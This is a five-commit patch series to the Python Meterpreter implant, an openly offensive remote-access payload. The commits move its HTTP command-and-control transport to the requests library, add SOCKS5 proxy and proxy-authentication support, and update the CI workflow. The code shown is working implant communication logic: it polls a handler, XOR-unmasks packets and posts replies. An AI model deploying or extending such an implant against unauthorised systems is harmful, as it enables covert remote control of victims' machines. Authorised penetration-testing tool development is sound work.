From 510890b863c02fd815bcb9173e32f1b0ec698603 Mon Sep 17 00:00:00 2001 From: 0xriasaat Date: Sun, 1 Dec 2024 00:04:04 +0600 Subject: [PATCH 1/5] Update meterpreter.py Added support for socks5 and socks5h proxy --- python/meterpreter/meterpreter.py | 99 ++++++++++++++++--------------- 1 file changed, 51 insertions(+), 48 deletions(-) diff --git a/python/meterpreter/meterpreter.py b/python/meterpreter/meterpreter.py index d6919c572..851737f66 100644 --- a/python/meterpreter/meterpreter.py +++ b/python/meterpreter/meterpreter.py @@ -13,6 +13,8 @@ import threading import time import traceback +import requests +from requests.auth import HTTPProxyAuth try: import ctypes @@ -62,7 +64,7 @@ DEBUGGING_LOG_FILE_PATH = None TRY_TO_FORK = True HTTP_CONNECTION_URL = None -HTTP_PROXY = None +PROXY = None HTTP_USER_AGENT = None HTTP_COOKIE = None HTTP_HOST = None @@ -1018,35 +1020,42 @@ def tlv_pack_transport_group(self): trans_group += self.tlv_pack_timeouts() return trans_group + + class HttpTransport(Transport): - def __init__(self, url, proxy=None, user_agent=None, http_host=None, http_referer=None, http_cookie=None): + def __init__(self, url, proxy=None, proxy_auth=None, user_agent=None, http_host=None, http_referer=None, http_cookie=None): super(HttpTransport, self).__init__() - opener_args = [] - scheme = url.split(':', 1)[0] - if scheme == 'https' and ((sys.version_info[0] == 2 and sys.version_info >= (2, 7, 9)) or sys.version_info >= (3, 4, 3)): - import ssl - ssl_ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23) - ssl_ctx.check_hostname = False - ssl_ctx.verify_mode = ssl.CERT_NONE - opener_args.append(urllib.HTTPSHandler(0, ssl_ctx)) - if proxy: - opener_args.append(urllib.ProxyHandler({scheme: proxy})) - opener_args.append(urllib.ProxyBasicAuthHandler()) + + self.url = url self.proxy = proxy - opener = urllib.build_opener(*opener_args) - opener.addheaders = [] - if user_agent: - opener.addheaders.append(('User-Agent', user_agent)) - if http_cookie: - opener.addheaders.append(('Cookie', http_cookie)) - if http_referer: - opener.addheaders.append(('Referer', http_referer)) + self.proxy_auth = proxy_auth self.user_agent = user_agent - urllib.install_opener(opener) - self.url = url - self._http_request_headers = {'Content-Type': 'application/octet-stream'} + self.session = requests.Session() + + # Set up proxies if provided + if proxy: + self.session.proxies = { + 'http': proxy, + 'https': proxy + } + + # Set up proxy authentication if provided + if proxy_auth: + self.session.auth = HTTPProxyAuth(*proxy_auth) # proxy_auth should be (username, password) + + # Add headers if provided + self.session.headers = { + 'Content-Type': 'application/octet-stream' + } + if user_agent: + self.session.headers['User-Agent'] = user_agent if http_host: - self._http_request_headers['Host'] = http_host + self.session.headers['Host'] = http_host + if http_referer: + self.session.headers['Referer'] = http_referer + if http_cookie: + self.session.headers['Cookie'] = http_cookie + self._first_packet = None self._empty_cnt = 0 @@ -1055,32 +1064,27 @@ def _get_packet(self): packet = self._first_packet self._first_packet = None return packet + packet = None xor_key = None - url_h = None - request = urllib.Request(self.url, None, self._http_request_headers) - urlopen_kwargs = {} - if sys.version_info > (2, 6): - urlopen_kwargs['timeout'] = self.communication_timeout + try: - url_h = urllib.urlopen(request, **urlopen_kwargs) - if url_h.code == 200: - packet = url_h.read() + response = self.session.get(self.url, timeout=self.communication_timeout) + + if response.status_code == 200: + packet = response.content if len(packet) < PACKET_HEADER_SIZE: - packet = None # looks corrupt + packet = None else: xor_key = struct.unpack('BBBB', packet[:PACKET_XOR_KEY_SIZE]) header = xor_bytes(xor_key, packet[:PACKET_HEADER_SIZE]) pkt_length = struct.unpack('>I', header[PACKET_LENGTH_OFF:PACKET_LENGTH_OFF + PACKET_LENGTH_SIZE])[0] - 8 if len(packet) != (pkt_length + PACKET_HEADER_SIZE): - packet = None # looks corrupt - except: - debug_traceback('[-] failure to receive packet from ' + self.url) + packet = None + except requests.RequestException as e: if not packet: - if url_h and url_h.code == 200: - # server has nothing for us but this is fine so update the communication time and wait - self.communication_last = time.time() + self.communication_last = time.time() delay = 100 * self._empty_cnt self._empty_cnt += 1 time.sleep(float(min(10000, delay)) / 1000) @@ -1090,12 +1094,11 @@ def _get_packet(self): return packet def _send_packet(self, packet): - request = urllib.Request(self.url, packet, self._http_request_headers) - urlopen_kwargs = {} - if sys.version_info > (2, 6): - urlopen_kwargs['timeout'] = self.communication_timeout - url_h = urllib.urlopen(request, **urlopen_kwargs) - response = url_h.read() + try: + response = self.session.post(self.url, data=packet, timeout=self.communication_timeout) + return response.content + except requests.RequestException as e: + return None def patch_uri_path(self, new_path): match = re.match(r'https?://[^/]+(/.*$)', self.url) @@ -1105,7 +1108,7 @@ def patch_uri_path(self, new_path): return True def tlv_pack_transport_group(self): - trans_group = super(HttpTransport, self).tlv_pack_transport_group() + trans_group = super(HttpTransport, self).tlv_pack_transport_group() if self.user_agent: trans_group += tlv_pack(TLV_TYPE_TRANS_UA, self.user_agent) if self.proxy: @@ -1751,7 +1754,7 @@ def create_response(self, request): pass if HTTP_CONNECTION_URL and has_urllib: - transport = HttpTransport(HTTP_CONNECTION_URL, proxy=HTTP_PROXY, user_agent=HTTP_USER_AGENT, + transport = HttpTransport(HTTP_CONNECTION_URL, proxy=PROXY, user_agent=HTTP_USER_AGENT, http_host=HTTP_HOST, http_referer=HTTP_REFERER, http_cookie=HTTP_COOKIE) else: # PATCH-SETUP-STAGELESS-TCP-SOCKET # From e3cc3eeafb354d6bdcc9327f88c041dbb93eb6f6 Mon Sep 17 00:00:00 2001 From: 0xriasaat Date: Sun, 1 Dec 2024 00:22:32 +0600 Subject: [PATCH 2/5] Update meterpreter.py added socks5 and socks5h support From 5569fc43310d15590e25250a3f68ca018c46b0f6 Mon Sep 17 00:00:00 2001 From: 0xriasaat Date: Sun, 1 Dec 2024 00:57:03 +0600 Subject: [PATCH 3/5] Update meterpreter.py FIxed a small bug --- python/meterpreter/meterpreter.py | 1 + 1 file changed, 1 insertion(+) diff --git a/python/meterpreter/meterpreter.py b/python/meterpreter/meterpreter.py index 851737f66..178bcc77f 100644 --- a/python/meterpreter/meterpreter.py +++ b/python/meterpreter/meterpreter.py @@ -1082,6 +1082,7 @@ def _get_packet(self): if len(packet) != (pkt_length + PACKET_HEADER_SIZE): packet = None except requests.RequestException as e: + debug_traceback(f"[-] Failure to receive packet from {self.url}: {e}") if not packet: self.communication_last = time.time() From 42b0fbc35a1b7c2eeab2004c638c9a6a7442ca39 Mon Sep 17 00:00:00 2001 From: 0xriasaat Date: Sun, 1 Dec 2024 01:25:22 +0600 Subject: [PATCH 4/5] Update python.yml fixed error for no module named --- .github/workflows/python.yml | 7 ++++++- 1 file changed, 6 insertions(+), 1 deletion(-) diff --git a/.github/workflows/python.yml b/.github/workflows/python.yml index 90309bf86..3a6dee869 100644 --- a/.github/workflows/python.yml +++ b/.github/workflows/python.yml @@ -60,13 +60,18 @@ jobs: DOCKER_IMAGE: ${{ matrix.docker_image }} run: | cd python/meterpreter - docker run --rm -w $(pwd) -v $(pwd):$(pwd) ${DOCKER_IMAGE} /bin/sh -c 'ls -lah; pip install mock; python -m unittest discover -v ./tests' + docker run --rm -w $(pwd) -v $(pwd):$(pwd) ${DOCKER_IMAGE} /bin/sh -c 'ls -lah; pip install mock requests; python -m unittest discover -v ./tests' - name: Set up Python on host if: ${{ !matrix.docker_image }} uses: actions/setup-python@v4 with: python-version: ${{ matrix.runtime_version }} + + - name: Install dependencies on host + if: ${{ !matrix.docker_image }} + run: | + pip install mock requests - name: Run tests on host if: ${{ !matrix.docker_image }} From 50c377147d4cc9ad09a09a1751394004775c5cf6 Mon Sep 17 00:00:00 2001 From: 0xriasaat Date: Sun, 1 Dec 2024 01:38:14 +0600 Subject: [PATCH 5/5] Update meterpreter.py fixed an error for older Python versions --- python/meterpreter/meterpreter.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/python/meterpreter/meterpreter.py b/python/meterpreter/meterpreter.py index 178bcc77f..a0d8883db 100644 --- a/python/meterpreter/meterpreter.py +++ b/python/meterpreter/meterpreter.py @@ -1082,7 +1082,7 @@ def _get_packet(self): if len(packet) != (pkt_length + PACKET_HEADER_SIZE): packet = None except requests.RequestException as e: - debug_traceback(f"[-] Failure to receive packet from {self.url}: {e}") + debug_traceback("[-] Failure to receive packet from " + str(self.url) + ": " + str(e)) if not packet: self.communication_last = time.time()